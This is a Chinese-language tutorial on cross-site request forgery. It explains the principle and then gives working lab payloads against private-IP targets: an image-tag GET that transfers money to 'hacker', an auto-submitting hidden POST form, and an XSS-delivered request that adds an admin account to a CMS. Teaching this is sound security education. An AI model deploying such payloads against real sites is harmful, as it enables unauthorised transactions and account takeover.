跨站请求伪造

1.CSRF 概述

1.1 CSRF 原理

1.1.1 基本概念

跨站请求伪造（Cross Site Request Forgery，CSRF）是一种攻击，它强制浏览器客户端用户在当前对其进行身份验证后的Web 应用程序上执行非本意操作的攻击，攻击的重点在于更改状态的请求，而不是盗取数据，因为攻击者无法查看伪造请求的响应。

借助于社工的一些帮助，例如，通过电子邮件或聊天发送链接，攻击者可以诱骗用户执行攻击者选择的操作。如果受害者是普通用户，则成功CSRF 攻击可以强制用户执行更改状态的请求，例如转移资金、修改密码等操作。如果受害者是管理账户，CSRF 攻击会危及整个Web 应用程序。

1.1.2关键点

受害者没有退出登录，受害者保持身份认证。
CSRF 继承了受害者的身份和特权，代表受害者执行非本意的、恶意的操作。
CSRF 会借用浏览器中与站点关联的所有身份凭据，例如用户的会话Cookie，IP 地址，Windows 域凭据等。

1.1.3 目标

CSRF 的目标是更改用户账户的状态，攻击者利用CSRF 发送的请求都是更改状态的请求，比如，转账、更改密码，购买商品等等。CSRF 的场景中，攻击者是没有办法获得服务器的响应

1.2 CSRF 场景

1.2.1 银行账户转账

在这里插入图片描述

1.2.2 构造虚假网站

构造CSRF 攻击连接。

<meta
<img charset='utf-8'> src='./1.jpg'><br/>
<img src='http://10.4.7.130/bank/action.php? username=hacker&money=100&submit=%E4%BA%A4%E6%98%93' alt='宝刀在手，谁与争锋'>

攻击者通过标签构造GET 请求。
浏览器根据标签中的 SRC 属性，请求服务器资源，会自动带上身份认证信息。

1.2.3 场景建模

在这里插入图片描述

1.3 CSRF 类别

1.3.1 POST 方式

<meta charset='utf-8'>
<form name='csrf'action='http://10.4.7.130/bank/action.php'  method='post'>
<input type='hidden' name='username' value='hacker'>
<input type='hidden' name='money' value='100'>
</form>
<script>document.csrf.submit()</script>
<img src="./1.jpg" ><br />
<!--<a href='javascript:document.csrf.submit()' style='color:red;font-size:100px'>宝刀在手，谁与争锋</a><br />

1.4 CSRF 验证

1.4.1 CSRF PoC generator

Burp Suite 自带插件，可以根据请求构造表单，进行CSRF 漏洞验证。

在这里插入图片描述

2.CSRF 攻防

2.1 CSRF 实战

2.1.1 与XSS漏洞相结合

攻击者可以利用XSS 触发CSRF 攻击。因为，可以利用JS 发送HTTP 请求。经过研究受害网站的业务流程，可以构造如下代码：

<script>
xmlhttp = new XMLHttpRequest(); xmlhttp.open("post","http://10.4.7.1/cms/admin/user.action.php",false); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=cgjil&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7
&userid=0");
</script>